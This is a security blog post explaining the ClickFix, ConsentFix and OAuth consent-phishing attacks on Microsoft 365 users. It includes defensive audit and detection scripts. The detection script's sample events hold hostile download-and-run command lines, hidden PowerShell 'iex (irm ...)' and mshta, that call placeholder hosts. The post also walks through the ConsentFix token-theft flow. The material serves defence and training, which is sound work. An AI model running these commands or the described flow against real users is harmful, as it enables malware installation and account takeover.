ClickFix, ConsentFix, and OAuth Consent Phishing: The Attacks That Don't Need Your Password
Phishing has evolved. Attacks like ClickFix and ConsentFix don't need your password or MFA — they hijack trust in real Microsoft login screens. Here's how to protect your team.
Mission Guard Team
May 5, 2026
8 min read
Phishing has changed. The attacks hitting organizations right now don't look like the suspicious emails your team was trained to spot. They look like CAPTCHA verifications, browser prompts, and Microsoft login screens — because in many cases, they are the real thing.
This post breaks down three related attack techniques that are actively targeting small organizations, nonprofits, and businesses in 2025–2026. More importantly, it gives you concrete steps to protect your team today.
What Is ClickFix?
ClickFix is a social engineering technique where an attacker tricks you into running a malicious command on your own computer. Unlike traditional phishing, there's no malicious attachment to scan and no fake login page to detect. You do the attacker's work for them.
Here's how it typically plays out:
You land on a webpage — through a search result, a phishing email, or even a compromised legitimate site.
A fake error message, CAPTCHA challenge, or "verification" prompt appears.
The page instructs you to press a keyboard shortcut (like Windows+R or Ctrl+V), paste something into a dialog box, and hit Enter.
What you just pasted was a PowerShell or terminal command that downloads and runs malware.
The technique is devastatingly effective because it exploits human problem-solving instinct. When your browser shows an error or asks you to verify something, your natural reaction is to follow the fix. Security tools have a hard time stopping it because you are the one executing the command — no exploit or malicious download is involved from the software's perspective.
ClickFix activity surged over 500% in early 2025 and remains one of the most common attack vectors heading into 2026. Variants now include fake Windows Update screens, crashed browser windows with "recovery" instructions, and spoofed Microsoft Teams pages.
Newer Variants to Watch For
Attackers don't sit still. Several named evolutions of ClickFix have appeared recently:
CrashFix intentionally crashes your browser, then presents "fix" instructions that install a malicious browser extension.
FileFix uses Windows File Explorer instead of the command line, making the interaction feel even more routine.
DNS-based ClickFix hides its payloads in DNS responses — a channel most security tools don't inspect closely.
All of them share the same core trick: convince the user to execute something themselves.
What Is ConsentFix?
ConsentFix takes the ClickFix concept and applies it to Microsoft's OAuth authentication system. First documented by Push Security in late 2025 and now tracked through a third iteration (v3) as of May 2026, this attack is particularly dangerous because it bypasses passwords, MFA, and even phishing-resistant authentication like passkeys entirely.
Here's the attack flow:
A victim visits a compromised or malicious webpage (often found through a normal Google search).
A fake Cloudflare Turnstile (CAPTCHA) asks for an email address. This filters out researchers and non-corporate accounts.
After entering a work email, the page presents a "Sign In" button and a set of copy-paste instructions.
Clicking "Sign In" opens a legitimate Microsoft login page in a new tab. The victim logs in normally (or their existing session is used automatically).
After authentication, the browser redirects to a localhost URL that contains an OAuth authorization code.
The victim is instructed to copy that localhost URL and paste it back into the original page.
The attacker's server extracts the authorization code, exchanges it for access and refresh tokens, and now has persistent access to the victim's Microsoft 365 account.
The entire sequence takes under 30 seconds. The victim sees a "verification successful" message and goes about their day. Meanwhile, the attacker can now read email, access OneDrive files, browse Teams messages, and in some cases perform administrative actions — all without ever knowing the victim's password.
Why This Is So Hard to Block
ConsentFix specifically abuses Azure CLI, which is a first-party Microsoft application. First-party apps are implicitly trusted in every Microsoft tenant. They can't be blocked, deleted, or restricted through normal app consent policies. They don't require admin approval. This is by design — it's a core part of how Microsoft's identity platform works — and attackers are exploiting that architectural trust.
ConsentFix v3 adds automation on top. It uses services like Pipedream for webhook-based token exchange and Hunter.io for email validation, turning what was once a manual attack into something that scales.
OAuth Consent Phishing: The Bigger Picture
ConsentFix is part of a broader category called OAuth consent phishing — attacks that abuse the legitimate app permission system built into platforms like Microsoft 365, Google Workspace, and others.
In a standard consent phishing attack, the attacker registers a malicious application (which is free and takes minutes) and sends the victim a link. That link opens a real Microsoft (or Google) consent screen asking the victim to grant the app permissions like "Read your email" or "Access your files." Because the consent screen comes from Microsoft's own servers, it looks completely legitimate. Once the victim clicks "Accept," the app has ongoing access to their account — no password required.
This category of attack is significant because:
MFA doesn't help. The victim authenticates normally. The attack happens after authentication.
Password changes don't help. The attacker has an OAuth token, not a password. Changing the password doesn't revoke the token.
The consent screen is real. It's hosted by Microsoft. It's not a fake page. This makes it extremely difficult for users to distinguish from a legitimate app installation.
State-sponsored groups have been observed using these techniques since at least late 2024, with Russian-linked actors specifically targeting government, academic, and nonprofit organizations through device code phishing and OAuth abuse.
How to Protect Your Organization
For IT Administrators
Restrict app consent policies. In Microsoft Entra ID (formerly Azure AD), configure user consent settings so that users can only approve apps from verified publishers or apps requesting low-risk permissions. Better yet, require admin approval for all third-party app consent. Starting July 2025, Microsoft enabled a managed consent policy by default that blocks users from consenting to third-party apps accessing files and sites — verify this is active in your tenant.
Audit existing OAuth app grants. Review which applications have been granted consent in your tenant. Look for apps with broad permissions (Mail.Read, Files.ReadWrite, etc.) that you don't recognize. Revoke anything suspicious immediately.
Monitor for Azure CLI anomalies. If your organization doesn't use Azure CLI, any sign-in events for that application should be treated as suspicious. In Entra ID audit logs, watch for Azure CLI authentication from unexpected locations or IP ranges.
Apply Conditional Access policies. Restrict sign-ins based on device compliance, location, and application. Be cautious about exempting Azure CLI or other developer tools from these policies — those exemptions are exactly what ConsentFix exploits.
Restrict PowerShell and terminal execution. For non-technical staff, consider policies that limit the ability to run PowerShell scripts or commands from untrusted sources. Windows AppLocker or WDAC (Windows Defender Application Control) can help.
Deploy endpoint detection. An EDR solution that monitors for unusual PowerShell activity, unexpected process chains, and suspicious clipboard behavior can catch ClickFix attacks even after a user executes the command.
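The ConsentFix flow above ends with a successful sign-in to Azure CLI that the victim never asked for, and the two audit steps recommended for administrators (reviewing consent grants, watching Azure CLI sign-ins) are what surface it. The following script is an added example, not code from the post or from Microsoft: it runs those two checks over constructed records shaped like the Microsoft Graph `signIn` and `oauth2PermissionGrant` objects, and emits the Graph calls that actually revoke access. The Azure CLI application ID, the list of high-risk scopes, the approved-user and expected-country sets, and all sample IDs are assumptions to adapt to your tenant.

```python
"""Audit Entra ID sign-ins and OAuth consent grants for ConsentFix-style abuse.

Added example; not code from the post or from Microsoft. It runs over
constructed records shaped like the Microsoft Graph `signIn` and
`oauth2PermissionGrant` objects; in a real tenant you would feed it the JSON
from GET /auditLogs/signIns and GET /oauth2PermissionGrants, joined with
GET /servicePrincipals for app names. The high-risk scope list is the author's.
"""

# Well-known first-party application ID of Azure CLI. Treat it as an assumption
# to verify: compare with the appId your own logs show for "Microsoft Azure CLI".
AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"

# Delegated scopes that give a token holder mailbox, file or directory reach;
# offline_access is listed because it is what yields a long-lived refresh token.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite", "Files.ReadWrite.All",
    "Directory.AccessAsUser.All", "offline_access",
}

# Constructed sample data; every ID except AZURE_CLI_APP_ID is a placeholder.
SAMPLE_SIGNINS = [
    {"id": "s1", "userPrincipalName": "alice@example.org", "appId": AZURE_CLI_APP_ID,
     "appDisplayName": "Microsoft Azure CLI", "ipAddress": "203.0.113.7",
     "location": {"countryOrRegion": "NL"}, "status": {"errorCode": 0}},
    {"id": "s2", "userPrincipalName": "bob@example.org", "appId": "placeholder-intranet-app",
     "appDisplayName": "Company Intranet", "ipAddress": "198.51.100.20",
     "location": {"countryOrRegion": "US"}, "status": {"errorCode": 0}},
    {"id": "s3", "userPrincipalName": "dev@example.org", "appId": AZURE_CLI_APP_ID,
     "appDisplayName": "Microsoft Azure CLI", "ipAddress": "198.51.100.21",
     "location": {"countryOrRegion": "US"}, "status": {"errorCode": 0}},
]
SAMPLE_GRANTS = [
    {"id": "g1", "clientId": "sp-placeholder-a", "consentType": "Principal",
     "principalId": "user-placeholder-alice",
     "scope": "User.Read offline_access Mail.Read Files.ReadWrite"},
    {"id": "g2", "clientId": "sp-placeholder-b", "consentType": "AllPrincipals",
     "principalId": None, "scope": "User.Read"},
]
SAMPLE_SERVICE_PRINCIPALS = {
    "sp-placeholder-a": {"displayName": "Mail Sync Helper", "verifiedPublisher": None},
    "sp-placeholder-b": {"displayName": "Company Intranet", "verifiedPublisher": "Example Org"},
}


def flag_azure_cli_signins(signins, known_cli_users, expected_countries):
    """Successful Azure CLI sign-ins by users who have no business using it, or
    from countries the organisation does not operate from. A ConsentFix victim
    produces exactly such an event even though they never ran Azure CLI."""
    flagged = []
    for s in signins:
        if s["appId"] != AZURE_CLI_APP_ID or s["status"]["errorCode"] != 0:
            continue
        reasons = []
        if s["userPrincipalName"] not in known_cli_users:
            reasons.append("user is not an approved Azure CLI user")
        country = s["location"]["countryOrRegion"]
        if country not in expected_countries:
            reasons.append(f"sign-in from {country} ({s['ipAddress']})")
        if reasons:
            flagged.append({"id": s["id"], "user": s["userPrincipalName"], "reasons": reasons})
    return flagged


def audit_grants(grants, service_principals):
    """Consent grants carrying high-risk delegated scopes, with the publisher
    status of the app that holds them (unverified plus broad scopes: review first)."""
    findings = []
    for g in grants:
        risky = sorted(set(g["scope"].split()) & HIGH_RISK_SCOPES)
        if not risky:
            continue
        sp = service_principals.get(g["clientId"], {})
        findings.append({"grant_id": g["id"], "app": sp.get("displayName", g["clientId"]),
                         "verified_publisher": sp.get("verifiedPublisher") is not None,
                         "consent_type": g["consentType"], "principal_id": g["principalId"],
                         "risky_scopes": risky})
    return findings


def revocation_plan(findings, flagged_signins):
    """Graph calls that cut access off. Access tokens already issued stay valid
    until they expire whatever you do to the password; revoking sessions
    invalidates refresh tokens, and deleting the grant removes the app's
    standing permission."""
    calls = []
    for f in findings:
        calls.append(("DELETE", f"/oauth2PermissionGrants/{f['grant_id']}"))
        if f["principal_id"]:
            calls.append(("POST", f"/users/{f['principal_id']}/revokeSignInSessions"))
    for s in flagged_signins:
        calls.append(("POST", f"/users/{s['user']}/revokeSignInSessions"))
    return calls


if __name__ == "__main__":
    flagged = flag_azure_cli_signins(SAMPLE_SIGNINS, {"dev@example.org"}, {"US"})
    findings = audit_grants(SAMPLE_GRANTS, SAMPLE_SERVICE_PRINCIPALS)
    for item in flagged + findings:
        print(item)
    for method, path in revocation_plan(findings, flagged):
        print(method, path)
```

Note the asymmetry the post points out: a third-party consent-phishing app shows up as a grant you can delete, whereas ConsentFix rides a first-party app, so there is no grant to remove and the only levers are revoking the victim's sessions and a Conditional Access policy that does not exempt Azure CLI.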
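The ClickFix sequence described earlier (Win+R, paste, Enter) leaves a distinctive trace in process-creation telemetry: an interpreter started by explorer.exe or a browser with a command line that fetches and evaluates remote content. The script below is an added example, not code from the post or from any EDR vendor, showing the detection logic the "deploy endpoint detection" step relies on. It runs over constructed events in Sysmon Event ID 1 shape (ParentImage, Image, CommandLine); the indicator patterns and severity rules are the author's own heuristics, and the hostnames use the reserved .invalid TLD.

```python
"""Flag ClickFix-style process chains in process-creation telemetry.

Added example; not code from the post or from any EDR vendor. The events
below are constructed to mimic Sysmon Event ID 1 fields (ParentImage, Image,
CommandLine); any EDR's process-creation records can be mapped to that shape.
The indicator patterns are the author's own heuristics, not a vendor rule set.
"""
import re

# Interpreters a ClickFix/FileFix lure asks the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Parents that mean a person launched it: the Run dialog (Win+R) and the
# File Explorer address bar are both hosted by explorer.exe; a browser parent
# means the page itself spawned the process.
HUMAN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line features typical of download-and-run rather than a scripted task.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass":   re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "remote_fetch":    re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl)\b", re.I),
    "eval_fetched":    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url_argument":    re.compile(r"https?://", re.I),
}

# Constructed sample events (placeholder hosts under the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {"id": "e1", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (irm https://verify.placeholder.invalid/c)"'},
    {"id": "e2", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": "e3", "User": "CORP\\dev", "ParentImage": "C:\\Program Files\\Microsoft VS Code\\Code.exe",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -c Get-ChildItem"},
    {"id": "e4", "User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe https://update.placeholder.invalid/fix.hta"},
    {"id": "e5", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -enc UExBQ0VIT0xERVItUExBQ0VIT0xERVI="},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reasons) for one process-creation event."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if child not in INTERPRETERS:
        return "none", []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    human = parent in HUMAN_PARENTS
    if human:
        reasons.insert(0, f"interpreter spawned by {parent}")
    # Fetch-and-evaluate, or a blob the person could not have read, is the
    # payload pattern; a person-launched parent is what makes it ClickFix.
    fetch_and_run = ({"remote_fetch", "eval_fetched"} <= set(reasons)
                     or "encoded_command" in reasons)
    if human and (fetch_and_run or "url_argument" in reasons):
        return "high", reasons
    if fetch_and_run:
        return "medium", reasons
    return "none", reasons


def hunt(events):
    """Events worth an analyst's attention, most severe first."""
    hits = []
    for e in events:
        severity, reasons = classify(e)
        if severity != "none":
            hits.append({"id": e["id"], "user": e["User"], "severity": severity, "reasons": reasons})
    return sorted(hits, key=lambda h: h["severity"] != "high")


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["id"], hit["user"], ", ".join(hit["reasons"]))
```

The explorer.exe parent is the discriminator that separates a pasted command from an administrator's scheduled script (event e2 above is left alone for that reason). On a flagged host, the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU usually still holds the pasted text, which confirms the chain came from the Win+R step rather than from automation.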
For End Users and Staff Training
No legitimate service will ever ask you to copy-paste a URL, code, or command into a dialog box, terminal, or browser field as a "verification" step. This is the single most important thing your team needs to understand. If a website asks you to open a Run dialog, paste something into PowerShell, or copy a URL from your address bar into another page — stop. Close the tab. Report it.
Be skeptical of CAPTCHA or verification pages that ask for your email address. Real CAPTCHAs (Cloudflare Turnstile, Google reCAPTCHA) never ask for an email. If one does, it's a filter designed to target you specifically.
Review app permission requests carefully. If a Microsoft or Google popup asks you to grant an application access to your email, files, or account, pause and ask: Did I initiate this? Do I recognize this application? If not, deny it and report it to your IT team.
A legitimate "fix" for a browser problem will never come from the webpage itself. If a page claims your browser is broken and offers step-by-step instructions, that's the attack. Close the tab and open your browser's actual settings or help menu instead.
Watch for localhost URLs. If your browser redirects to a URL starting with http://localhost during what seemed like a normal login flow, something unusual is happening. Don't copy that URL anywhere. Close the tab.
The Bottom Line
These attacks succeed because they hijack trust — trust in Microsoft's real login screens, trust in familiar CAPTCHA prompts, and trust in the instinct to "fix" something that looks broken. They don't need your password. They don't need to beat your MFA. They just need one click-and-paste from someone having a busy day.
The best defense is a team that knows what to look for and an environment configured to limit what damage can be done when someone inevitably slips. No organization is too small to be targeted — in fact, smaller teams with fewer security layers are often the most attractive targets.